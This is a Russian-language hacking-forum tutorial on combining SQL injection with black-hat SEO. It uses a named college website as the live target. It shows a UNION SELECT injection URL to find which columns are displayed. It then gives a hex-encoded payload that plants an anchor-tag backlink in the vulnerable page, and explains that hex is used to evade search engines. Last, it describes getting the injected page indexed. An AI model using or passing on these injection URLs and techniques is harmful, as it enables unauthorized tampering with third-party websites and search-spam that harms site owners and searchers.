Доброго времени суток, уважаемые форумчане.

В данном ликбезе,я попробую доступно объяснить как совместить эти, вроде бы разные вещи.

Начнем, как обычно, с теории.

SEO:

Для увеличения ТиЦ и PR сайта, нужно иметь беки (ссылки на Ваш сайт) с авторитетных (и не очень) ресурсов, чем больше ссылок - тем больше пузо(мерки).

Я надеюсь, что эти азы знает каждый, но на всякий случай

SQL inj:

С помощью атак такого рода злостные хакеры, то есть мы, получают данные, находящиеся в базе SQL, для взлома сайта.

Вы спросите, как это все связано? Очень просто, так как при sql-inj данные из базы выводятся на страницу, которая имеет свой собственный урл (хоть и с exploit'ом, но свой урл!), если данные выводятся на страницу, соответственно, они присутствуют в исходном коде этой страницы, а это же и есть пресловутый бек-линк!

К примеру, мы имеем sql-inj на сайте, при этом выводится например поле №7, соответственно вместо поля мы можем прописать линк на нужный нам сайт и он окажется на этой странице.

Дабы было меньше воды и больше дела я продемонстрирую:

http://www.erskine.edu/library/newsfetcher.htm?igor=466+union+select+1,2,3,4,5--

Как Вы можете видеть выводятся колонки 3 и 5 (в самом низу)

Теперь изменим запрос

http://www.erskine.edu/library/newsfetcher.htm?igor=466+union+select+1,2,0x3c6120 687265663d277777772e4e4143485f534149542e77734c4f4d 273e424f54205459542054454b4354204c494e4b27413c2f61 3e,4,5-- (не забудьте убирать пробелы из примеров)

И что же Мы видим? Появился бек на наш сайт, как и положено, в теге и по феншую...

По полочкам:

3c6120687265663d277777772e4e4143485f534149542e7773 4c4f4d273e424f54205459542054454b4354204c494e4b2741 3c2f613e - это хекс вот этого: BOT TYT TEKCT LINK'A, то есть самого обычного тега

Почему хекс если можно просто вывести в '' (апострофах), потому что так мы меньше палимся перед поисковыми машинами, да и вывести в кавычках не всегда удается из-за пробелов.

И так, Мы получили бек-линк, надо сообщить об этом поисковому роботу, тут уже вступает Ваша фантазия, кто-то добавляет через add-url поисковика (самое дебильное, что можно придумать), кто-то поступает умнее и выкладывает линк на эту страницу на ресурсе, чтобы при индексации ресурса робот перешел по ссылке и проиндексировал ее...

Короче - кто на что горазд.

После индексации этой страницы мы получаем бек, который будет с нами до прикрытия уязвимости.

Ну вот, собственно и вся статейка...больно не пинайте, ибо первая она у меня

Спасибо за внимание, с уважением, z0mbyak.

P.S. Метод не мой, я его обнаружил в гугле(когда искал потенциально уязвимые сайты), на Русском, описания данного типа чероного СЕО, не встечал, только упоминание на eng.